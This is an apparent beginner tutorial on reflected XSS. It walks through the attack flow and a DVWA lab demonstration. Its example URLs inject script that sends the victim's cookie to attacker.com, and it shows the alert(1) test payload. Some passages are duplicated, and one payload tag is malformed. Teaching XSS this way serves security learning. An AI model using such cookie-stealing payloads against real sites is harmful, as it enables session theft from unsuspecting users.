- Execute malicious JavaScript
- Execute client-side exploits
- Bypass CSRF protections
- Temporary defacement
In Reflected XSS the attacker’s payload script has to be part of the request which is sent to the web server and reflected back in such a way that the HTTP response includes the payload from the HTTP request. The below diagram shows how the reflected XSS attack work.
1. The attacker crafts a URL containing a malicious string or attacker's payload and sends it to the victim. The string malicius link would be :
1. The attacker crafts a URL containing a malicious string or attacker's payload and sends it to the victim. The string malicius link would be :
http://vuln-site.com/?q=<script>window.location='http://attacker.com/?cookie='+document.cookie<script>
2. Now the victim clicked that link, and the and the HTTP request would be sent to the vulnerable server (website) along with the XSS payload.
3. The vulnerable website response with the attacker supplied paylaod.
4. The victims browser's executes the attcaker's supplied payload, which is in the server reponse, then the malicius payload will send the victim's cookie to attackers server. Now the attacker have access to victim's cookies.
By using Phishing emails and other social engineering techniques, the attacker lures the victim to inadvertently make a request to the server which contains the XSS payload and ends-up executing the script that gets reflected and executed inside the browser. Since Reflected XSS isn’t a persistent attack, the attacker needs to deliver the payload to each victim – social networks are often conveniently used for the dissemination of these attacks. The simple example of reflected XSS is :
The above figure the submit box have reflected xss vulnerability. To test for reflected xss, we just need to put our payload, and if the web app reflects back the malicious payload back to the browser than it has reflected xss vulnerability. And as we know that the widely used xss test payload is
<script>alert(1)</script>.
And as we can see that it contains reflected xss vulnerability. Now lets look at the source code of the page. And if we see the Browser address bar, then at here we can see the payload (because of GET HTTP Request), which assigned to key name.
Now at here, an attacker can craft a malicious payload and send it the victim, in order to steal his/her cookies. The malicious payload will look like
http://192.168.56.101/dvwa/vulnerabilities/xss_r/?name=<script>window.location='http://attacker.com/?cookie='+document.cookie</script>
And when the victim click on the above link then the malicious payload will executed.
Conclusion :
At first, reflected XSS might seem harmless because it requires the victim himself to actually send a request containing a malicious string. But with the help of various techniques and methods an attacker can successfully trick the victim and convenience him to click on the malicious link.
Links :
XSS Basics : XSS Guide For Beginners
Stored XSS : Click here
DOM-Based XSS : Click here
Conclusion :
At first, reflected XSS might seem harmless because it requires the victim himself to actually send a request containing a malicious string. But with the help of various techniques and methods an attacker can successfully trick the victim and convenience him to click on the malicious link.
Links :
XSS Basics : XSS Guide For Beginners
Stored XSS : Click here
DOM-Based XSS : Click here